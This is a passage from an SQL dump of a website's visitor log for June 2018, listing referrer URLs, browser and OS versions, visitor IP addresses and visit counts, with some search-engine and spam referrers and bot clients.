0),(31512,'2018-06-09','https://zphiblgz.org','Firefox','Windows','40.1','','87.116.179.26','000',2,0),(31513,'2018-06-09','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(31514,'2018-06-09','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(31515,'2018-06-09','https://zphiblgz.org','et','Unknown','Unknown','','185.35.63.34','000',1,0),(31516,'2018-06-09','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.25.244','000',2,0),(31517,'2018-06-09','https://zphiblgz.org','Firefox','Windows','40.1','','103.219.15.130','000',2,0),(31518,'2018-06-09','https://zphiblgz.org','MSIE','Windows','6.0','','45.58.38.113','000',3,0),(31519,'2018-06-09','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(31520,'2018-06-09','zphiblgz.org','Chrome','Windows','46.0.2754.75','','133.242.54.221','000',6,0),(31521,'2018-06-09','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','192.42.116.20','000',10,0),(31522,'2018-06-09','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','193.15.16.4','000',9,0),(31523,'2018-06-09','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','62.210.37.82','000',1,0),(31524,'2018-06-09','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.28','000',1,0),(31525,'2018-06-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','49.51.168.80','000',2,0),(31526,'2018-06-09','http://avtovykup.kz/','MSIE','Windows','6.0','','46.185.74.179','000',3,0),(31527,'2018-06-09','https://zphiblgz.org','Firefox','Windows','40.1','','85.98.110.96','000',2,0),(31528,'2018-06-09','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.190.226','000',1,0),(31529,'2018-06-09','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.220.0','000',2,0),(31530,'2018-06-09','https://www.atyks.ru/','MSIE','Windows','5.5','','134.249.52.34','000',4,0),(31531,'2018-06-09','https://zphiblgz.org','MSIE','Windows','9.0','','23.254.202.163','000',2,0),(31532,'2018-06-09','https://zphiblgz.org','Chrome','Macintosh','34.0.1847.116','','45.58.38.113','000',2,0),(31533,'2018-06-09','https://zphiblgz.org','Firefox','Windows','40.1','','181.47.137.9','000',2,0),(31534,'2018-06-09','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','108.62.70.32','000',1,0),(31535,'2018-06-09','https://spb-plitka.ru/','MSIE','Windows','6.0','','134.249.52.34','000',3,0),(31536,'2018-06-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(31537,'2018-06-09','https://r.search.yahoo.com/_ylt=AwrJ7FicNBxbtPQALE9x.9w4;_ylu=X3oDMTBydDI5cXVuBGNvbG8DYmYxBHBvcwM2BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1528603932/RO=10/RU=https%3a%2f%2fzphiblgz.org%2fhistory%2f/RK=2/RS=V7SV2TIMgQob91Y1bS3DDH7x0SI-','Safari','iPhone','11.0','','107.77.233.194','000',2,0),(31538,'2018-06-09','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.28','000',1,0),(31539,'2018-06-09','https://www.google.com/','Chrome','Macintosh','67.0.3396.79','','66.225.109.50','000',2,0),(31540,'2018-06-09','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.28','000',1,0),(31541,'2018-06-09','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','64.233.172.160','000',1,0),(31542,'2018-06-09','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','64.233.172.168','000',1,0),(31543,'2018-06-09','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.29','000',1,0),(31544,'2018-06-09','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(31545,'2018-06-09','https://slomm.ru/','MSIE','Windows','5.5','','178.137.163.137','000',3,0),(31546,'2018-06-09','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.35','000',1,0),(31547,'2018-06-09','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.27','000',1,0),(31548,'2018-06-09','https://zphiblgz.org','Chrome','Windows','58.0.3029.96','','125.80.129.173','000',6,0),(31549,'2018-06-09','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.28','000',1,0),(31550,'2018-06-09','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.28','000',1,0),(31551,'2018-06-09','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(31552,'2018-06-10','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(31553,'2018-06-10','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.189.53','000',1,0),(31554,'2018-06-10','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','139.59.187.197','000',2,0),(31555,'2018-06-10','https://zphiblgz.org','Firefox','Windows','40.1','','50.66.36.151','000',2,0),(31556,'2018-06-10','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',7,0),(31557,'2018-06-10','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.179.49','000',1,0),(31558,'2018-06-10','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.179.204','000',1,0),(31559,'2018-06-10','https://sinhronperevod.ru/','MSIE','Windows','6.0','','134.249.52.34','000',6,0),(31560,'2018-06-10','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.6','000',1,0),(31561,'2018-06-10','https://zphiblgz.org','python-requests','Unknown','2.18.3','','18.188.164.188','000',2,0),(31562,'2018-06-10','https://zphiblgz.org','AppleWebKit','Linux','534.34','','18.188.164.188','000',2,0),(31563,'2018-06-10','https://zphiblgz.org','Python-urllib','Unknown','2.7','','41.230.166.74','000',2,0),(31564,'2018-06-10','https://luckybull.io/','MSIE','Windows','6.0','','134.249.54.27','000',4,0),(31565,'2018-06-10','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(31566,'2018-06-10','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(31567,'2018-06-10','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.29','000',1,0),(31568,'2018-06-10','https://zphiblgz.org','python-requests','Unknown','2.18.4','','193.106.30.99','000',1,0),(31569,'2018-06-10','https://zphiblgz.org','Firefox','Windows','40.1','','156.205.85.171','000',2,0),(31570,'2018-06-10','https://zphiblgz.org','Firefox','Windows','40.1','','92.86.39.229','000',2,0),(31571,'2018-06-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(31572,'2018-06-10','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.87.168','000',2,0),(31573,'2018-06-10','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.30','000',1,0),(31574,'2018-06-10','https://www.google.com/','Chrome','Windows','66.0.3359.181','','71.204.249.121','000',4,0),(31575,'2018-06-10','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.202','000',4,0),(31576,'2018-06-10','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.203','000',2,0),(31577,'2018-06-10','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.208','000',1,0),(31578,'2018-06-10','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.199','000',3,0),(31579,'2018-06-10','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.209','000',1,0),(31580,'2018-06-10','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.195','000',1,0),(31581,'2018-06-10','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.212','000',1,0),(31582,'2018-06-10','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.215','000',1,0),(31583,'2018-06-10','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.35','000',1,0),(31584,'2018-06-10','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','52.165.129.203','000',1,0),(31585,'2018-06-10','http://shnyagi.net/','MSIE','Windows','6.0','','46.185.74.179','000',3,0),(31586,'2018-06-10','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(31587,'2018-06-10','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(31588,'2018-06-10','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.31','000',1,0),(31589,'2018-06-11','https://documentserver.net/','MSIE','Windows','6.0','','134.249.54.27','000',1,0),(31590,'2018-06-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.189.225.99','000',4,0),(31591,'2018-06-11','https://zphiblgz.org','Python-urllib','Unknown','2.7','','13.250.6.135','000',1,0),(31592,'2018-06-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','120.79.186.194','000',2,0),(31593,'2018-06-11','https://zphiblgz.org','Firefox','Windows','40.1','','112.202.128.63','000',2,0),(31594,'2018-06-11','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.226.171','000',2,0),(31595,'2018-06-11','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.30','000',1,0),(31596,'2018-06-11','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(31597,'2018-06-11','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.30','000',1,0),(31598,'2018-06-11','https://zphiblgz.org','MSIE','Windows','9.0','','61.16.130.30','000',2,0),(31599,'2018-06-11','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(31600,'2018-06-11','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',8,0),(31601,'2018-06-11','http://www.zphibmaryland.org/chapters/','Chrome','Windows','67.0.3396.79','','50.237.63.11','000',10,0),(31602,'2018-06-11','http://www.google.com/','Chrome','Android','66.0.3359.158','','96.241.78.200','000',6,0),(31603,'2018-06-11','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(31604,'2018-06-11','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.29','000',1,0),(31605,'2018-06-11','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.215.254.26','000',2,0),(31606,'2018-06-11','https://zphiblgz.org','Chrome','Windows','41.0.2226.0','','139.59.60.111','000',2,0),(31607,'2018-06-11','https://zphiblgz.org','Chrome','Macintosh','41.0.2227.1','','139.59.60.111','000',3,0),(31608,'2018-06-11','https://zphiblgz.org','Chrome','Windows','24.0.1295.0','','139.59.60.111','000',2,0),(31609,'2018-06-11','74.220.219.51','Firefox','Windows','33.0','','159.203.42.143','000',1,0),(31610,'2018-06-11','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.30','000',1,0),(31611,'2018-06-11','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.31','000',1,0),(31612,'2018-06-11','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(31613,'2018-06-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.196.108.57','000',4,0),(31614,'2018-06-11','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','66.102.7.184','000',1,0),(31615,'2018-06-11','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','66.102.7.186','000',1,0),(31616,'2018-06-11','https://bird1.ru/','MSIE','Windows','6.0','','178.137.163.137','000',5,0),(31617,'2018-06-11','http://www.google.com/','Chrome','Android','66.0.3359.158','','107.77.202.24','000',3,0),(31618,'2018-06-11','https://zphiblgz.org','Chrome','Windows','67.0.3396.62','','214.36.0.135','000',1,0),(31619,'2018-06-11','https://zphiblgz.org','Chrome','Windows','67.0.3396.62','','214.36.6.109','000',3,0),(31620,'2018-06-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(31621,'2018-06-11','https://zphiblgz.org','Firefox','Macintosh','58.0','','52.18.200.51','000',40,0),(31622,'2018-06-11','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.220.0','000',2,0),(31623,'2018-06-11','https://zphiblgz.org','Firefox','Windows','40.1','','193.40.12.10','000',2,0),(31624,'2018-06-11','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.28','000',1,0),(31625,'2018-06-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.233.222','000',2,0),(31626,'2018-06-11','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(31627,'2018-06-11','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',2,0),(31628,'2018-06-11','https://zphiblgz.org','Chrome','Chrome OS','66.0.3359.181','','69.250.127.5','000',3,0),(31629,'2018-06-12','zphiblgz.org','Chrome','Windows','50.0.2661.75','','173.203.70.234','000',1,0),(31630,'2018-06-12','zphiblgz.org','Chrome','Windows','50.0.2661.75','','144.217.15.227','000',5,0),(31631,'2018-06-12','zphiblgz.org','Chrome','Windows','50.0.2661.75','','89.107.186.104','000',8,0),(31632,'2018-06-12','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',6,0),(31633,'2018-06-12','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','185.127.17.208','000',3,0),(31634,'2018-06-12','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(31635,'2018-06-12','http://zphiblgz.org/','Firefox','Linux','52.0','','163.172.4.153','000',1,0),(31636,'2018-06-12','https://zphiblgz.org/','Firefox','Windows','52.0','','163.172.4.153','000',1,0),(31637,'2018-06-12','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.27','000',1,0),(31638,'2018-06-12','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(31639,'2018-06-12','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(31640,'2018-06-12','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.29','000',1,0),(31641,'2018-06-12','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.29','000',1,0),(31642,'2018-06-12','https://zphiblgz.org','Firefox','Windows','40.1','','117.203.251.30','000',2,0),(31643,'2018-06-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.30','000',1,0),(31644,'2018-06-12','https://www.souvenirua.com/uk/','MSIE','Windows','6.0','','134.249.52.34','000',6,0),(31645,'2018-06-12','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(31646,'2018-06-12','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.190','000',3,0),(31647,'2018-06-12','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.84','000',4,0),(31648,'2018-06-12','https://www.google.com/','Chrome','Windows','66.0.3359.170','','199.96.153.92','000',1,0),(31649,'2018-06-12','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.32','000',1,0),(31650,'2018-06-12','http://zphiblgz.org/scholarship/','Chrome','Android','67.0.3396.81','','172.58.83.255','000',3,0),(31651,'2018-06-12','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','77.247.181.165','000',1,0),(31652,'2018-06-12','https://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.64','000',1,0),(31653,'2018-06-12','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','69.243.44.12','000',3,0),(31654,'2018-06-12','https://www.google.com/','Chrome','Android','67.0.3396.68','','73.250.78.254','000',1,0),(31655,'2018-06-12','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','80.82.215.17','000',1,0),(31656,'2018-06-12','http://shnyagi.net/','MSIE','Windows','6.0','','46.185.74.179','000',3,0),(31657,'2018-06-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','102.156.20.111','000',2,0),(31658,'2018-06-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(31659,'2018-06-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.106.37.223','000',1,0),(31660,'2018-06-12','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.162','000',3,0),(31661,'2018-06-12','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.86','000',3,0),(31662,'2018-06-12','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','46.166.139.35','000',1,0),(31663,'2018-06-12','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(31664,'2018-06-12','https://zphiblgz.org','MSIE','Windows','9.0','','23.101.169.3','000',2,0),(31665,'2018-06-12','https://zphiblgz.org','Firefox','Windows','38.0','','51.38.14.170','000',3,0),(31666,'2018-06-12','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.187','000',4,0),(31667,'2018-06-12','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.82','000',3,0),(31668,'2018-06-12','https://zphiblgz.org','Firefox','Windows','1.0.7','','176.122.23.15','000',1,0),(31669,'2018-06-12','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.237.68.93','000',3,0),(31670,'2018-06-12','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.227.64.170','000',12,0),(31671,'2018-06-12','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.237.248.15','000',41,0),(31672,'2018-06-12','https://zphiblgz.org','Chrome','Windows','67.0.3396.87','','73.133.254.145','000',8,0),(31673,'2018-06-12','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.99.9.147','000',1,0),(31674,'2018-06-12','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.149','000',1,0),(31675,'2018-06-12','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.99.66','000',24,0),(31676,'2018-06-13','https://sinhronperevod.ru/','MSIE','Windows','6.0','','134.249.52.34','000',2,0),(31677,'2018-06-13','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',6,0),(31678,'2018-06-13','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.237.180.75','000',22,0),(31679,'2018-06-13','https://zphiblgz.org','MSIE','Windows','9.0','','23.101.169.3','000',2,0),(31680,'2018-06-13','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.224.63','000',2,0),(31681,'2018-06-13','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','35.227.25.15','000',66,0),(31682,'2018-06-13','https://zphiblgz.org','MSIE','Windows','6.0','','37.120.174.39','000',1,0),(31683,'2018-06-13','http://fidalsa.de/','MSIE','Windows','6.0','','178.137.163.137','000',5,0),(31684,'2018-06-13','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(31685,'2018-06-13','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','159.203.85.194','000',1,0),(31686,'2018-06-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','47.96.233.88','000',2,0),(31687,'2018-06-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','80.84.57.117','000',1,0),(31688,'2018-06-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','80.84.57.92','000',2,0),(31689,'2018-06-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','80.84.57.104','000',2,0),(31690,'2018-06-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','80.84.57.101','000',2,0),(31691,'2018-06-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1817.slMuRN6vHQF8m8Ea-Cq-58YIJ8HUT0eW2edGbI0UTu4.46ba63609cf3720ca9c02a53bdb4e7518683eaa2&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041S0pjc2ZsVmdEaTlxM3lIeWloelVHNlJJRTAyd1dmZk9lTENFYzg3bUN5QSws&sign=ae31cf3620d541dd7981b1e7a4ce8ce1&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.4.134','000',2,0),(31692,'2018-06-13','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','78.46.90.120','000',1,0),(31693,'2018-06-13','https://zphiblgz.org','Safari','Macintosh','11.0.3','','144.76.168.111','000',1,0),(31694,'2018-06-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1817.kmnr2ORJCBrLUZiqPyXkXfS9DN4N850jfibr08kIgCg.13731c6352d3d942b2a237fde060668811b2f93b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042RGg5VVJySU9yZVZFVTRjMDVoMi1kWjZuekhHRGpYQWZPM3dCVTRBUnVZZyws&sign=e6128d33f979c383c968447c2d4e925e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.35.127','000',2,0),(31695,'2018-06-13','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.162','000',2,0),(31696,'2018-06-13','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.82','000',2,0),(31697,'2018-06-13','https://zphiblgz.org','Chrome','Windows','67.0.3396.79','','182.74.23.22','000',3,0),(31698,'2018-06-13','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','199.249.223.81','000',1,0),(31699,'2018-06-13','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',2,0),(31700,'2018-06-13','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.29','000',1,0),(31701,'2018-06-13','https://zphiblgz.org','python-requests','Unknown','2.18.4','','42.113.186.243','000',14,0),(31702,'2018-06-13','https://zphiblgz.org','Python-urllib','Unknown','2.7','','42.113.186.243','000',1,0),(31703,'2018-06-13','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.187','000',1,0),(31704,'2018-06-13','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.86','000',1,0),(31705,'2018-06-13','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',2,0),(31706,'2018-06-13','https://zphiblgz.org','Safari','Macintosh','4.0','','37.120.174.39','000',2,0),(31707,'2018-06-13','http://fanoboi.com/dog-13.html','Unknown','Unknown','Unknown','','134.249.52.34','000',2,0),(31708,'2018-06-13','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',1,0),(31709,'2018-06-13','https://zphiblgz.org','Firefox','Windows','39.0','','195.22.127.227','000',2,0),(31710,'2018-06-13','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.189.193','000',1,0),(31711,'2018-06-13','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.68','000',1,0),(31712,'2018-06-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1817.AzkOlZz3o3FIrVTsF5ubltLfWdJ9Tm-JnaTQ0U-uaEI.007d3b4eae0f954a45dcce747eef683e3a77186b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041V1ZSejhkbmcxTE9KNzNUUHI3RF9SMU02RHZlazFfZ0pMREVBbXRkQk5LQSws&sign=21a9f77266cea3341566b82be223a14d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','51.255.140.207','000',2,0),(31713,'2018-06-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1817.lQMizEuM2jEXVVBmwpbSmQCqZgNsmR3RgQ9MPeG0IFA.2cc926b10252d98a6c2c330392ae3a571aa267cc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043czNrZTE1Z2M5V2VfdnprZEtHNUIzWWhCaDRlTjFmVnZsNWgyQllwZzNqQSws&sign=71b6ac42ac39b18e55821d2349e13967&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.111.97','000',2,0),(31714,'2018-06-13','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1817.6-KzqvUghN2gQ_s0_M00knRCnaZhQaJbrRWszBbzXNY.dea695fc5f2dfa864494c5c9d5a7361c86046979&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043MVlEcEVIWHJpRkl5ZEJ6RF9ZS2dzbDhoTVMxQUQwelZfemwzeDFiR1dQQSws&sign=1d43b89229615cbc7f1ac022e446a761&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','104.236.149.50','000',2,0),(31715,'2018-06-13','https://officedocuments.net/','MSIE','Windows','6.0','','134.249.54.27','000',4,0),(31716,'2018-06-13','https://www.google.com/','Chrome','Windows','67.0.3396.87','','96.244.96.210','000',11,0),(31717,'2018-06-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(31718,'2018-06-13','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','188.240.208.26','000',2,0),(31719,'2018-06-13','https://zphiblgz.org','Firefox','Windows','40.1','','116.87.196.36','000',2,0),(31720,'2018-06-13','http://www.zphibmaryland.org/chapters/','Chrome','iPhone','67.0.3396.69','','172.56.2.140','000',4,0),(31721,'2018-06-13','https://vzubkah.com/','MSIE','Windows','6.0','','46.185.74.179','000',3,0),(31722,'2018-06-13','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.220.0','000',2,0),(31723,'2018-06-13','https://zphiblgz.org','Safari','iPhone','11.0','','76.21.167.41','000',8,0),(31724,'2018-06-13','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.30','000',1,0),(31725,'2018-06-13','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','107.174.228.142','000',1,0),(31726,'2018-06-13','https://zphiblgz.org','Firefox','Windows','40.1','','58.174.68.27','000',2,0),(31727,'2018-06-13','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(31728,'2018-06-13','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(31729,'2018-06-13','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.29','000',1,0),(31730,'2018-06-13','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.29','000',1,0),(31731,'2018-06-13','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.29','000',1,0),(31732,'2018-06-13','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.29','000',1,0),(31733,'2018-06-13','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.29','000',1,0),(31734,'2018-06-13','https://www.google.com/','Safari','Macintosh','11.0.3','','66.192.117.14','000',2,0),(31735,'2018-06-14','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(31736,'2018-06-14','https://www.google.com/','Safari','iPhone','604.1','','107.77.236.124','000',2,0),(31737,'2018-06-14','http://pizza-tycoon.com/','Chrome','Linux','37.0.2062.120','','185.225.68.13','000',1,0),(31738,'2018-06-14','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.234.103','000',2,0),(31739,'2018-06-14','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.29','000',1,0),(31740,'2018-06-14','https://zphiblgz.org','Faraday','Unknown','Unknown','','54.221.152.119','000',2,0),(31741,'2018-06-14','https://zphiblgz.org','Safari','Linux','538.1','','54.174.24.223','000',2,0),(31742,'2018-06-14','https://zphiblgz.org','Safari','Linux','538.1','','54.89.213.91','000',2,0),(31743,'2018-06-14','https://zphiblgz.org','Ruby','Unknown','Unknown','','54.221.152.119','000',3,0),(31744,'2018-06-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.221.152.119','000',1,0),(31745,'2018-06-14','https://zphiblgz.org','Firefox','Macintosh','52.0','','35.233.9.49','000',40,0),(31746,'2018-06-14','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1818.iy9qwTCjESN6ARg5BtOe020Onx_HiSd28HhMKEZVqSg.213b3c3e4f1b8b3ef58264732dc212b624832db8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU